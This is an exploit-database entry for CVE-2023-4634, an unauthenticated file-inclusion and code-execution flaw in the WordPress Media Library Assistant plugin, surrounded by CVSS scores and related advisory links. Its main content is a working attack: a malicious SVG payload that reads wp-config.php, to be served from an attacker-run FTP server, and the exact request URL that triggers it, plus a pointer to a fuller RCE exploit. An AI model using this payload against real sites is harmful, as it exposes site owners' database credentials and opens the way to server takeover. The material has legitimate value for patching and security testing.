Lucene search
Florent MONTEL1337DAY-ID-39104HistoryOct 09, 2023 - 12:00 a.m.
Wordpress Media Library Assistant Plugin - Remote Code Execution / Local File Inclusion Exploit
2023-10-0900:00:00
Florent MONTEL
0day.today
82
wordpress
remote code execution
local file inclusion
imagick
exploit
cve-2023-4634
ftp
directory listing
rce
configuration file
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
0.032
Percentile
91.4%
# Exploit Title: Media Library Assistant Wordpress Plugin - RCE and LFI
# CVE: CVE-2023-4634
# Exploit Author: Florent MONTEL / Patrowl.io / @Pepitoh / Twitter @Pepito_oh
# Exploitation path: https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
# Exploit: https://github.com/Patrowl/CVE-2023-4634/
# Vendor Homepage: https://fr.wordpress.org/plugins/media-library-assistant/
# Software Link: https://fr.wordpress.org/plugins/media-library-assistant/
# Version: < 3.10
# Tested on: 3.09
# Description:
# Media Library Assistant Wordpress Plugin in version < 3.10 is affected by an unauthenticated remote reference to Imagick() conversion which allows attacker to perform LFI and RCE depending on the Imagick configuration on the remote server. The affected page is: wp-content/plugins/media-library-assistant/includes/mla-stream-image.php
#LFI
Steps to trigger conversion of a remote SVG
Create a remote FTP server at ftp://X.X.X.X:21 (http will not work, see references)
Host 2 files :
- malicious.svg
- malicious.svg[1]
Payload:
For LFI, getting wp-config.php:
Both malicious.svg and malicious.svg[1] on the remote FTP:
<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:../../../../wp-config.php" width="500" height="500" />
</svg>
Then trigger conversion with:
http://127.0.0.1/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://X.X.X.X:21/malicious.svg&mla_debug=log&mla_stream_frame=1
# Directory listing or RCE:
To achieve Directory listing or even RCE, it is a little more complicated.
Use exploit available here:
https://github.com/Patrowl/CVE-2023-4634/
# Note
Exploitation will depend on the policy.xml Imagick configuration file installed on the remote server. All exploitation paths and scripts have been performed with a default wordpress configuration and installation (Wordpress has high chance to have the default Imagick configuration).
Related
cve
cve
CVE-2023-4634
2023-09-06 09:15:08
cvelist
cvelist
CVE-2023-4634
2023-09-06 08:27:50
nuclei
nuclei
Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion
2023-09-05 13:30:09
githubexploit
githubexploit
Exploit for CVE-2023-4634
2023-09-05 07:44:15
prion
prion
Input validation
2023-09-06 09:15:00
exploitdb
exploitdb
Media Library Assistant Wordpress Plugin - RCE and LFI
2023-10-09 00:00:00
wpexploit
wpexploit
nvd
nvd
CVE-2023-4634
2023-09-06 09:15:08
wpvulndb
wpvulndb
wordfence
wordfence
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
0.032
Percentile
91.4%
Related for 1337DAY-ID-39104